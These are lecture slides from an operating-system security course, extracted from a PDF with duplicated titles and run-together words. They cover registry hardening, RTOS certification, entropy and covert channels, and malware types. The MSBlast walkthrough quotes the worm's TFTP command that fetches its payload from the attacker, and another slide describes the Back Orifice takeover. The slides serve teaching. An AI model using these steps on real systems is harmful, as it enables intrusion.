INSE 6130 Operating System Security
Odds and Ends
Prof. Lingyu Wang
1
OutlineOutline
Registry SecurityEmbedded and Real-Time OS SecurityInformation FlowThe Phantom Menace Review for Final Exam
2
RegistryRegistryWhat is registry
Configuration data stored in a hierarchical databaseConfiguration data stored in a hierarchical databaseReplacement of .ini, .sys, and .com configuration filesA tree with five root keysy
HKEY_LOCAL_MACHINE: hardware/OS data of this computerHKEY_CLASSES_ROOT: OLE and file-class association dataHKEY CURRENT USER: profile for user logged on interactivelyHKEY_CURRENT_USER: profile for user logged on interactively HKEY_USERS: actively user profiles of non-remote usersHKEY_CURRENT_CONFIG: hardware profile
Hives (trees rooted at top)Hives (trees rooted at top)DEFAULT, SAM, SECURITY, SOFTWARE, and SYSTEM in C:\Windows\System32\Config and ntuser dat in C:\Documents and Settings\administrator
3
and ntuser.dat in C:\Documents and Settings\administrator
http://msdn.microsoft.com/en-us/library/windows/desktop/ms724871(v=vs.85).aspx
Registry Best PracticeRegistry Best Practice
One incorrect edit to the registry can crash the ti toperating system
If you are not completely sure about what you are doing, then better don't do itdoing, then better don t do it
Backup before you modify itUse the backup utility (accessories->system tools)Use the backup utility (accessories system tools)Export/import registry hives
4
Access Control on RegistryAccess Control on Registry
What you can do in regeditd h ld“can” does not mean you should
Grant full control/ownership of a registry key Assign (customized) permissions to a registry key toAssign (customized) permissions to a registry key to users or groupsAudit users/groups’ activity on a registry keyg p y g y y
Restricting accessesLocal accesses: you can only make it inconvenientRemote accesses: shouldn’t be given in most cases
Domain controllers have accesses
5
Registry Hacks for Hardening OSRegistry Hacks for Hardening OS
E.g., prevent NTLM password hashesd d 2000 k b d h hXP and Windows 2000 use kerberos and NTLM hash is
there for backwards compatibilityNTLM hashes can be easily broken by Rainbow crackNTLM hashes can be easily broken by Rainbow crack
KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa Win2K: Add NoLMHash = 1Xp: Value name: NoLMHash Data type: REG DWORD Radix:Xp: Value name: NoLMHash, Data type: REG_DWORD Radix: Decimal Value data: 1
E.g., prevent (SYN) DoS attacks in W2kThe connection responses time out more quickly in the event of a SYN attack
HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services
6
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services key: SynAttackProtectValue: 0,1,2 (default to best protection)
OutlineOutline
Registry SecurityEmbedded and Real-Time OS SecurityInformation FlowThe Phantom Menace Review for Final Exam
7
Where Are Embedded/Real-time OS?Where Are Embedded/Real time OS?
Bombardier Challenger 300
h d fl h
US Army's Crusader
RTOS in the adaptive flight display systems
RTOS processes ballistic calculations, the graphical user interface and real-ti i t t l
F-35time equipment control systems
F 35
RTOS powers a portion of the Panoramic Cockpit Display subsystem
8
p y y
http://www.lynuxworks.com/rtos/rtos-178.php
Why Are Such Systems different?Why Are Such Systems different?
A time constraint on an operation MUST be met dl f th t l dregardless of the system load
Not the case on our PCsA good example: Anti lock braking system (ABS)A good example: Anti-lock braking system (ABS)
System reliability, availability, etc.Availability= (mean time toMTTFAvailability= (mean time to
failure/recovery)MTTRMTTF +
9
The Standard for RTOSThe Standard for RTOSDO-178B: "Software Considerations in Airborne Systems and Equipment Certification"and Equipment Certification
A de facto standard for certifying aviation software, such as RTOSSoftware systems are categorized by the effects of their failures
A: Catastrophic - Failure may cause a crash B: Hazardous - Failure has a large negative impact on safety or performance, or reduces the ability of the crew to operate the plane .. C M j F il i i ifi t b t h l i t th tC: Major - Failure is significant, but has a lesser impact that a Hazardous failure (e.g., leads to passenger discomfort)D: Minor - Failure is noticeable, but has a lesser impact than a Major failure (e g causing passenger inconvenience or a flight plan change)failure (e.g., causing passenger inconvenience or a flight plan change) E: No Effect - Failure has no impact on safety, aircraft operation, or crew workload
The development process of a software is subject to different
10
The development process of a software is subject to different requirements based on its level
LynxOS-178 RTOSLynxOS 178 RTOS
An RTOS certifiable to DO-178B level Ad h h f d fProvides security through fixed partitions of resources
(time and memory)System events in one partition cannot interfere withSystem events in one partition cannot interfere with events in another
E.g., CD player and ABS
11
Safety and SecuritySafety and Security
Common Criteria (CC)d d ( SO/ C 08) fA standard (ISO/IEC 15408) for computer security
A framework for specifying security requirements and implementing/claiming and testing such requirementsimplementing/claiming and testing such requirements
DO-178B and CCSoftware developed to DO-178B Level A standards willSoftware developed to DO 178B Level A standards will map closely to either an EAL 4 or 5CC basically requires a small kernel capable of control i f ti fl d i t i d t i l tiinformation flow and maintain data isolation DO-178B kernel space partitioning provides bothFrom DO 178B to EAL 7 mostly formal method
12
From DO-178B to EAL 7, mostly formal method
http://www.csds.uidaho.edu/comparison/stc2002.pdf
OutlineOutline
Registry SecurityEmbedded and Real-Time OS SecurityInformation FlowThe Phantom Menace Review for Final Exam
13
What We Already KnowWhat We Already Know
Information flows whenl d ( h)I write to slides (push)
You read slides (pull)You read what I have writtenYou read what I have written
Information flow policy in BLP and BibaBLP: flow up (e g unclassfied to secret)BLP: flow up (e.g., unclassfied to secret)Biba: flow down (e.g., high integrity to low integrity)Chinese Wall: flow inside a CD (except sanitized)( p )
Question:How to we model/measure “information flow”?
14
/
Answer: EntropyAnswer: EntropyH(X) = - Σi p(X=xi) log2 p(X=xi)
M th t i t f XMeasures the uncertainty of XHow many bits required to represent X
ExampleExampleX = 0 or 1, equally likely
H(X) = - ( p(X=0)log2 p(X=0) + p(X=1)log2 (X=1) )H(X) = ( p(X=0)log2 p(X=0) + p(X=1)log2 (X=1) )= - (1/2 log2 1/2 + 1/2 log2 1/2 ) = 1
Y = 1 certainly; Y=0 impossible H(Y) = - ( p(Y=1)log2 p(Y=1) )
= - 1 log2 1 = 0
15
The IntuitionThe IntuitionQuestion: Do you need to know entropy in the final exam?
B f t d lBefore today, no clueAnswer: Yes 50% No 50% entropy 1
Right now, likelyRight now, likelyAnswer: Yes 60% No 40% entropy 0.97
After the final exam…Answer: Yes - 100% or 0% entropy 0
Seeing slides, or the exam decreases your uncertaintySeeing slides, or the exam decreases your uncertainty (entropy) about the question
Information flows to you from slides (exam)M i f ti fl t f th f lid
16
More information flows to you from exam than from slides
Example 1Example 1Suppose
X b ith 0 1 ll lik lX can be either 0 or 1, equally likelySo, H(X) = 1
IfIfValue assignment Y := X (X: exam question; Y: my expression)
ThenThenH(X|Y) = 0 , knowing Y gives you X (Looking at my expression
gives you the exam question)g y q )
Value assignment causes information flow X → YWhat if c : value assignment Y := 1? (I am expressionless)
17
Example 2Example 2Suppose
0 ≤ X ≤ 7 ll lik l0 ≤ X ≤ 7, equally likelySo, H(X) = –8(1/8) log2 (1/8) = 3Z = 1 2 or 3 equally likelyZ = 1, 2 or 3, equally likely
IfY := X + ZY := X + Z
ThenKnowing Y, X can have at most 3 valuesKnowing Y, X can have at most 3 valuesH(X | Y) < –3(1/3) log (1/3) = log2 3 < 3Information flows X → Y
18
Example 3Example 3Suppose
X ll lik l t b ith 0 1X equally likely to be either 0 or 1y equally likely to be either true or falseH(X) = 1 H(Y) = 1H(X) = 1, H(Y) = 1
IfX > 0 ? Y:= true : Y:= falseX > 0 ? Y:= true : Y:= false
ThenH(X|Y) = 0H(X|Y) 0Information flows X → Y
Implicit information flow
19
pNo direct value assignment between X and Y
Confinement ProblemConfinement ProblemPrevent leaking confidential information
E If l i t i kEasy: If processes only communicate via known communication channels
IsolationIsolationVirtual machines
OS runs on emulated ‘computer’, restrictied by VM
SandboxingA virtual machine for process, instead of OS
VMware
WindowsJVM
Windowshardware hardware
20
Linux Applet
Covert ChannelCovert ChannelIsolation only prevents direct communication via known channelsknown channelsCovert channel is a communication channel not intended for communicationintended for communication
Storage channel, shared storage-basedTiming channel, time-basedTiming channel, time based
21
Example 1 – Storage ChannelExample 1 Storage ChannelProcesses p, q not allowed to communicate
B t th h fil tBut they share a file system
They set up a storage channelAgree on two file names /tmp001 txt and /tmp002 txtAgree on two file names, /tmp001.txt and /tmp002.txt If p wants to send q a bit 1, it creates the file /tmp001.txt; otherwise it creates /tmp002.txt/ p ; / pq records a bit based on the file name, and then deletes the file, so p can send the next bit
p q
/
1 p q
/
0
22
/tmp001.txt /tmp002.txt
Example 2 – Timing ChannelExample 2 Timing ChannelTiming attack on cryptosystem
Modular exponentiation algorithm (square and multiply)Modular exponentiation algorithm (square and multiply)Computes x = az mod n, where z = z0 … zk–1
x := 1; atmp := a;f i 0 t k 1 d b ifor i := 0 to k–1 do beginif zi = 1 then
x := (x * atmp) mod n;atmp := (atmp * atmp) mod n;p ( p p) ;
endresult := x;
Each 1 bit of z results in two multiplicationsRun time will be proportional to number of 1 bits
23
Example 3 – Timing ChannelExample 3 Timing ChannelTwo processes set up a timing channel
T d 0 bit li i h CPU it t CPUTo send 0 bit: p relinquishes CPU as soon as it gets CPUTo send 1 bit: p uses CPU for the full timing slotq determines a bit by seeing how quickly it gets CPUq determines a bit by seeing how quickly it gets CPU
p gets CPU, and relinquishes it p gets CPU p relinquishes CPU
q gets CPU1
q gets CPU0
24
Noise/Mitigation of Covert ChannelNoise/Mitigation of Covert ChannelWhen many processes share the same resource, the covert channel will be noisycovert channel will be noisy
Noise will reduce the capacity of a covert channelBut does not remove it (remember any communicationBut does not remove it (remember any communication channel is noisy)
Mitigation of covert channel: obscure resource usageg gDevote uniform, fixed amount of resources to each process, even if some resources are wasted
C t l CPU l ( RTOS)Crypto example, CPU example (e.g., RTOS)
Inject randomness into allocation/use of resources
25
Make Positive Use of Covert ChannelMake Positive Use of Covert ChannelTracking anonymous P2P VOIP calls AliceP2P VOIP calls
The connection between them is mixed
Alice
bet ee t e s edwith many others
Headers modifiedPayload encrypted
Anonymizing networkPayload encrypted
Suppose we suspect Alice is talking to BobgHow do we prove it?
Bob
26
Make Use of Covert Channel Cont’dMake Use of Covert Channel Cont dTrack the call by transmitting a watermark through a timing channel based on inter packet delaystiming channel based on inter-packet delays
BobAlice
BobAlice Add Watermark: 1011Detect Watermark
Bit 1 Bit 0
27
Bit 1 Bit 0
Question: why we always move packet to the right?
Web-based ApplicationWeb based Application
Internet
Client ServerEncrypted Traffic
Advantages:
Less client-side resources
Characteristics:
Low entropy inputsLess client side resources
Easier to deliver and maintain
Low entropy inputs
Rich & diverse resource objects
Stateful communications
28
Side-Channel AttackSide Channel Attack
InternetSize and directions of packets
Client ServerEncrypted Traffic
pbetween users and search engine
Fixed pattern: identified input t i
User Input Observed Directional Packet Sizes
string
a: 801→, ←54, ←509, 60→
00: 812→, ←54, ←505, 60→,
813 54 507 60813→, ←54, ←507, 60→
b-byte s-byte
29
Indicator of input itself
Side-Channel Attack Cont’dSide Channel Attack Cont dS value for each character entered as:First keystroke: Second keystroke:
a b c d e f g
509 504 502 516 499 504 502
y y
First Keystroke
Second Keystroke
a b c dh i j k l m n
509 492 517 499 501 503 488
o p q r s t
e a b c d
a 509 487 493 501 497
b 504 516 488 482 481o p q r s t
509 525 494 498 488 494
u v w x y z
b 504 516 488 482 481
c 502 501 488 473 477
d 516 543 478 509 499503 522 516 491 502 501 d 516 543 478 509 499
Unique s value 12 out of 1616 out of 16In reality, it may take more than
30
two keystrokes to uniquely identify an input string.
Leak out users’ private information: the input string
OutlineOutline
Registry SecurityEmbedded and Real-Time OS SecurityInformation FlowThe Phantom Menace Review for Final Exam
31
The Phantom MenaceThe Phantom Menace
M li iMaliciousPrograms
Needs HostProgram Independent
Trapdoors Logic Bombs Trojan Horses Viruses Worms Zombies RootkitsTrapdoors Logic Bombs Trojan Horses Viruses Worms Zombies Rootkits
32
BackdoorBackdoorSecret entry point into a system
Special user identifier/password that circumvents normal securitySpecial user identifier/password that circumvents normal security procedures.
Commonly used by developersy y pCould be included in a compiler (e.g., Ken Thompson)
Example: Back Orifice (BO) Win98 at DEFCON 6 in 1998, BO2k in 1999 BO server can be embedded in an executable file, when you run that file, BO silently installs itself as 122K “ .exe”that file, BO silently installs itself as 122K .exeRun a BO client, scan network for port 31337 (ELEET-elite), find any BO server - that machine is yours
33
Logic BombLogic Bomb
Embedded in legitimate programsActivated when specified conditions met
E.g., presence/absence of some file; Particular date/time or particular userdate/time or particular user
When triggered, typically damages systemModify/delete files/disksy
Example: “CIA slipped bugs to Soviets”“In January 1982, President Ronald Reagan approved a CIA plan to sabotage the economy of the Sovieta CIA plan to sabotage the economy of the Soviet Union through covert transfers of technology that contained hidden malfunctions, including software that l t t i d h l i i Sib i t l
34
later triggered a huge explosion in a Siberian natural gas pipeline”
RootkitRootkit
A set of programs and codes that allows a t i t t d t t blpermanent or consistent, undetectable presence
on a computerHide malicious resources e g processes filesHide malicious resources, e.g., processes, files, registry keys, open ports, etc.Provide hidden backdoor accesses
Simple rootkits:Modify user programs (ls, ps), detectable by tools like Tripwire
Sophisticated rootkits:
35
Modify the kernel itself, hard to detect from userland
WormWorm
Runs independently hDoes not require a host program
Propagates a fully working version of itself to other machinesother machinesCarries a payload performing hidden tasks
Backdoors spam relays DDoS agents;Backdoors, spam relays, DDoS agents; …
PhasesProbing Exploitation Replication PayloadProbing Exploitation Replication Payload
36
Worm PropagationWorm Propagation
1:Target Probing
2: Vulnerability Exploitation
A Worm A Victim3: Replication
A Staged View of Worm Infection
37
MSBlast Worm (Aug 2003)MSBlast Worm (Aug., 2003)10. Closes connection 11. Shell closes
7. Runs TFTP command;
8. Sends “START msblast.exe” command 9. Runs worm on target!
>tftp –I 192.168.0.1 GET msblast.exe
C “ ”5. Creates “TFTP Server” on port 69/UDP
6. Sends “TFTP” command to shell “teleports” msblast.exe file
1. Exploits target on port 135/TCP 2. Binds svchost.exe to port3. Connects to target on port 4444/TCP
4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
Blaster Target/RPC
p g p4444/TCP via injected code
38
192.168.0.1 192.168.10.11
BotnetBotnetZombie
A computer that is secretly installed with TrojanA computer that is secretly installed with Trojan horse and can be used for attacksBots join specific IRC channel on a Server and wait j pfor further commandsAttacker remotely controls the bot
BotnetA network of zombies controlled by a ‘bot herder’
f l h d f bConsisting of several ten thousands of botsUsually for malicious purposes
39
Botnets Cont’dBotnets Cont d
Botnet is usually for profitb d l f S ( S) kDistributed Denial-of-Service (DDoS) Attacks
Spamming – install SOCKS v4/v5 proxy for spam emailsemailsSniffing traffic/key logging – e.g., credit card numberSpreading new worms/virusesp gAds add-ons, spyware, phishing
Paid for clicking ads (Google adsense)
Attacking IRC chat net o ks Clone attackAttacking IRC chat networks – Clone attackManipulating online polls/gamesMass Identity theft
40
Mass Identity theft
How Does Botnet Work (1)How Does Botnet Work (1)
Attacker scans1Unsecured Computers
Attacker
Attacker scansInternet for
unsecured systems that can be compromised
1
p
Internet
41
How Does Botnet Work (2)How Does Botnet Work (2)
Attacker secretlyUnsecured Computers
Attacker
Attacker secretlyinstalls zombie agent
programs, turning unsecured computers
2Zombies
unsecured computers into zombies
Internet
42
How Does Botnet Work (3)How Does Botnet Work (3)
Zombie agentsZombie agents
Attacker
Zombie agentsZombie agents``phone home’’
and connect to a master server
3Zombies
master server
MasterMasterServer
Internet
43
How Does Botnet Work (4)How Does Botnet Work (4)
Attacker sends commands 4
AttackerZombies
to Master Server to launch a DDoS attack against a targeted system
4
MasterMasterServer
Internet
44
How Does Botnet Work (5)How Does Botnet Work (5)
Master Server5
AttackerZombies
Master Serversends signal to
zombies to launch attack on targeted
5
Master
gsystem
MasterServer
Internet
d
45
TargetedSystemSystem
OutlineOutline
Registry SecurityEmbedded and Real-Time OS SecurityInformation FlowThe Phantom Menace Review for Final Exam
46